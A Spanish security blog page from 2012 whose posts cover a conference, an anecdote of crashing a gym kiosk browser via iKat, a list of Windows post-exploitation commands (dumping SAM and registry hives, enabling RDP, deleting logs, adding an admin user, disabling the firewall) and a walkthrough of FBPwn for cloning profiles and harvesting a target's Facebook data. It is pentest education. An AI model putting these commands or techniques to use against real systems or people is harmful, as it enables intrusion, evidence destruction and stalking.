miércoles, 7 de noviembre de 2012

Charlas Navaja Negra. Seguridad. Albacete.España.


El motivo del post de hoy es informaros de un evento que me parece muy interesante publicitar, y para ser sinceros, hacer un poco de ego-spam.

El 30 de noviembre( viernes tarde) y el 1 de diciembre (sábado mañana) se celebra en Albacete las segunda conferencia NAVAJA NEGRA.

Hace unos meses se celebró la primera, y creo que todos los que asistimos nos quedamos encantados con lo que allí se presentó. Honeypots, hardening/anti-fingerprint, Hacking en IPV6, desarrollo web seguro, leyes, etc.

Bajo mi punto de vista, lo más importante de estos eventos es el "social-networking" que se realiza, ya que podemos hablar directamente con la gente que escribe los artículos, intercambiar experiencias, dudas, todo eso con unos coffe&cigarretes. A veces se aprende mas en una conversación de 5 minutos, que en un manual, o al menos, el manual siempre estará ahí, y la oportunidad de reunirse con colegas del sector, pues no la tenemos todos los días. Termino la parte sentimental.

Para esta segunda conferencia se han buscado temas de lo mas dispares.
Mi presentación, From mail to jail: Exploit your ex-girlfriend, pretende mostrar a los asistentes los pasos para realizar un pentest, y como "darle forma" a todas esas técnicas, herramientas, procesos, etc que leemos a diario, pero que mucha gente no sabe "materializar" en un Pentest.
Se van a presentar charlas de ingeniería inversa, Android, Hash, Appliances vulnerables, Exploit´s y malware, comunicaciones móviles, Ipv6 visto por un IDS etc.
Todas las charlas aquí.

Para la gente que se desplaza desde fuera de Albacete, hay un descuento del 30% en los servicios de RENFE, y una oferta muy interesante para pernoctar el viernes allí. Animaros en asistir y participar en esta evento !!!!!

Sinceramente me parece muy interesante esta segunda conferencia NAVAJA NEGRA y os animo a que realicéis la inscripción. Hay plazas limitadas !!!!

martes, 6 de noviembre de 2012

iKat 2012... no me toqueis las...

Ayer era un lunes maravilloso en mi ciudad Murcia. Hacia buen día, y como todos los lunes ( y este más, por ser primero de mes) arranco el día con buenos propósitos. A eso de la media tarde me voy al gimnasio, al cual suelo pagar una cuota elevadísima, a bajar un poco el atracón de sushi del fin de semana.


Voy indumentado con ropa deportiva, lo que viene siendo un pantalón y una camiseta, sin mangas, pero no de tirantes ( tal y como indica el manual del gimnasio). En la sala habrá unas 10 personas con el mismo tipo de prenda, pero claro, tengo pinta de macarra !!! tatuajes, rapao, barba, auriculares etc. Se me acerca el niñato de turno que se cree dios dentro del gimnasio, porque esta fuerte, a decirme que con esa ropa no puedo entrenar, que otro dia traiga camiseta con mangas ! si te cojo... !!! como la fuerza no es lo mio, pensé, te vas a enterar xD.
Ese gimnasio es uno de esos caros, muy caros, en los que todo huele a colonia jajajaaj y en las bicicletas hay una pantalla táctil con televisión, internet, radio y juegos. Internet+kinomakino+cabreo= entretenimiento. automáticamente cargo la url de http://ikat.ha.cked.net y me dedico a jugar un poco. Para los que no lo sabéis, iKat es una iniciativa que pretende mediante el navegador, ofrecernos ese tipo de cosas que nos gustan a los informáticos tocar/probar en los kioskos,máquinas dispensadoras etc. El resultado fué que la bicicleta corre un sistema linux i686..blabalba. Probé a sacar los cuadros de diálogo típicos de guardar, imprimir abrir para ver si tenía acceso a algún comando bonito, pero la verdad es que estaba bien diseñado, y nada mas saltarme el cuadro se iba a background ( alguien sabe algo sobre esto? ). Una de las opciones que tiene esta web es simplemente CRASH mediante código html, plugins instalados como flash o pdf.


No pude acceder al sistema, que hubiera sido interesante para probar una reverse shell hacia alguna máquina mala-malosa, pero si que pude "romperlo" y dejarle un cuelgue hasta que reiniciaran la bici xD.


Por supuesto que NO apunte la ip externa y probé desde mi tor-trinidad y tovago y no encontré nada...sistemas de cámaras, vpn´s y demás.
No es el propósito del post, pero me parece interesante mostrar esto.

ENCUENTRA LAS DIFERENCIAS



 La diferencia es sencilla, y hay que llevar mucho cuidado porque gracias a esta tontería, ya tengo el usuario.

Bueno, después de esta peliculilla mañanera recomendaros que probéis esta url en vuestros kioskos favoritos, en vuestros pc´s y si consigue "romper" os dediquéis un rato a ver los log´s y ver que teneis vulnerable.
También sería interesante meter en el proxy esta url, y todas las relacionadas con "cual es mi ip" para minimizar el impacto en caso de uso.
Como siempre, gracias por leerme.



lunes, 5 de noviembre de 2012

Cosas que hacer dentro...Post Explotation en Windows

Como todos sabéis, después de leer mi post sobre post-explotation meterpreter voy a seguir con algún que otro comando interesante, esta vez desde la shell de sistemas Windows, para comprometer aún más un sistema, acceder a más información etc.
A la hora de realizar un test de intrusión no basta con hacerle una carpeta en el disco duro del servidor, podemos encontrar con un gerente que no le baste con esto, yo sería así xD por lo que hay que trabajar bastante en la post-explotación.

ipconfig /displaydns: muestra la cache dns del equipo en cuestión. sin hacer DNS cache snooping ni nada.
podemos probar después a hacer un ipconfig/flushdns para liberar la cache, y volver a lanzarlo. Sería interesante hacer un flushdns como logout script para minimizar estos comportamientos?
net view /domain:nombredeldominio: listar los equipos en una red con dominio.
net user /domain: lista usuarios en el dominio...
route print: muestra la tabla de rutas, interesante para averiguar subredes y enlaces hacia otras redes de proveedores, colaboradores, por ejemplo, una empresa de outsourcing dentro la organización ( sin salida por internet)
netsh wlan show profiles: muestra los perfiles de conexión a redes wi-fi del equipo.
gpresult /z: conjunto resultante de directivas, como cuando usamos la mmc, pero en modo texto.

ficheros interesantes para su estudio posterior:
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\iis6.log (5, 6 or 7)
%WINDIR%\system32\logfiles\httperr\httperr1.log
%SystemDrive%\inetpub\logs\LogFiles 
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)
 %WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
 %WINDIR%\system32\config\default.sav
 %WINDIR%\system32\config\security.sav
 %WINDIR%\system32\config\software.sav
 %WINDIR%\system32\config\system.sav
 %WINDIR%\system32\CCM\logs\*.log
 %USERPROFILE%\ntuser.dat
 %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
 %WINDIR%\System32\drivers\etc\hosts


tasklist /V /S nombre :Procesos ejecutados en un pc remoto dentro la red.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f : hablitar el servicio Remote Desktop.
 del %WINDIR%\*.log /a /s /q /f : borrar todos los fichero de log´s en esa ruta.
net user usuario clave /add: añadir un usuario local.
net localgroup administradores /add usuario: añadir el usuario dado al grupo administradores locales.
netsh firewall set opmode disable:deshabilitar el firewall de windows.


El amigo de Seguridad a lo jabali está recopilando un monton de "kung fu" line commands en su blog, te sugiero que le pegues un vistazo, ya que encontrarás líneas dedicas a la administración de sistemas Windows.

Como siempre, gracias por leerme !!!

Proyectos-Pentesting colectivo.

Estimados lectores de Inseguros. A partir de ahora voy a ayudar con material al grupo de Facebook Seguridad- Informática. Os animo a que participéis de la manera que esté en vuestras manos, para hacer colectivo el conocimiento en materia de seguridad informática.

Por otro lado os comento a mis lectores de RSS, que teneís disponible en la web una nueva página, llamada Community Pentest en la que iré recopilando artículos en castellano, no solo mios como hasta ahora, para ayudarnos a realizar un test de intrusión o Pentest.
Os animo también a participar en esta iniciativa, añadiendo artículos que creáis interesantes, mediante el correo que indico en la web.
Perdonar si ya conocíais la existencia de este proyecto, pero es que el RSS no publicó la página y por ese motivo escribo este post.
Por último, ofreceros mi ayuda en materia de seguridad informática mediante la cuenta de Twitter @kinomakino.
Como siempre, gracias por leerme !!!

miércoles, 31 de octubre de 2012

FBPwn, si no hackeas a tu ex-girlfriend, investigala !!! xD

Todos sabemos lo doloroso, o no, que es una ruptura nupcial. Días de porno en casa a solas, mas porno, y así todos los días. En unos casos a unos le da por comer, y a otros por no comer xD.
Bueno, pues este post no tiene nada que ver con el amor, sino con una herramienta para usar la ingeniería social en Facebook.
El propósito de esta herramienta no es otro sino el de recopilar información de nuestra "víctima" y conocidos. Siendo este un blog de seguridad, y no de salsa rosa, se me ocurre utilizarlo para obtener conocimiento de una persona o empresa, para facilitarnos el trabajo de pentesting. Es decir, que no sirve para juacker Facebook.
Fbpwn lo podemos bajar de la web, en su versión gráfica-flamante-windowsera.
Lo instalamos y ejecutamos, y lo primero que tenemos que hacer es añadir una cuenta de facebook existente. Lo suyo es tener una blanca, limpia, para no levantar sospechas claro... PERO tiene que estar en idiomas ingles, y tienes que usar el nick de la cuenta, no el mail. Si creas un perfil "falso" para usarlo, tienes que tener el nick validado...


Una vez introducimos una cuenta válida, procedemos a atacar, como? dándole al botón ( estos usuarios !!!).
Nos aparece una ventana en la que indicamos la url al perfil que queremos atacar.
Punto y coma, esta herramienta no hace ningún tipo de magia,por ejemplo, si quieres ver fotos privadas de alguien que no tienes permiso, no vas a poder. Esta herramienta lo que hace es facilitar el trabajo. Por debajo trabaja con peticiones a la web de Facebook normales...Aquí es cuando muchos dejáis de leer xD.
bueno, la foto del menú.


Podemos elegir que módulos usar, pero lo suyo es saber más o menos que hacen xD:

- AddVictimFriends:  Con este plugin lo que hacemos es añadir automaticamente amigos de la víctima. La teoría es que si usamos un perfil "falsete", añadir amigos de la víctima para generar confianza a la hora de solicitar la amistad al perfil víctima.
- ProfileCloner: Copia toda la información pública de uno de los amigos de la víctima, para que la víctima acepte la solicitud.
- CheckFriendRequest: Comprueba si la cuenta falseta es amiga de la víctima. Constantemente la comprueba hasta que se produce la amistad.
- DumpFriends: Vuelca información PUBLICA de los amigos de la víctima. Insisto en lo de antes, si no es pública, esta herramienta no hace magia.
- DumpImages: Misma historia que arriba, pero con las imágenes y sus comentarios ( trabajo posterior de metadatos? )
- DumpInfo: Mismo pero con la información.
- DumpWall: Mismo que arriba pero con las publicaciones del muro
- DictionaryBuilder: Construye una lista de palabras obtenidas en los comentarios... Muy útil. Por ejemplo, en un auditoría de claves a Sheldon Cooper deberíamos usar "bazinga" ...A mi no me ha funcionado con los perfiles que he probado...
- CloseFriendsFinder: No he entendido muy bien este módulo, ya que se supone que contando comentarios en muro y etiquetas obtiene la información de número de contactos ( por si alguien no tiene bloqueado, pero si es una cuenta falseta? ).


Os recomiendo que probéis uno a uno los módulos, para saber que hacen. Indicarle una ruta válida para almacenar toda esta información. También he detectado que como no guarda las hojas de estilo, al ver la información volcada hay que trabajarlo un poco, pero es muy interesante esta herramienta. Para mi, lo mejor, lo de volcar información de muro, fotos e info en ficheros de texto, que luego podemos usar de base para crear una wordlist potente.

Como siempre, gracias por leerme.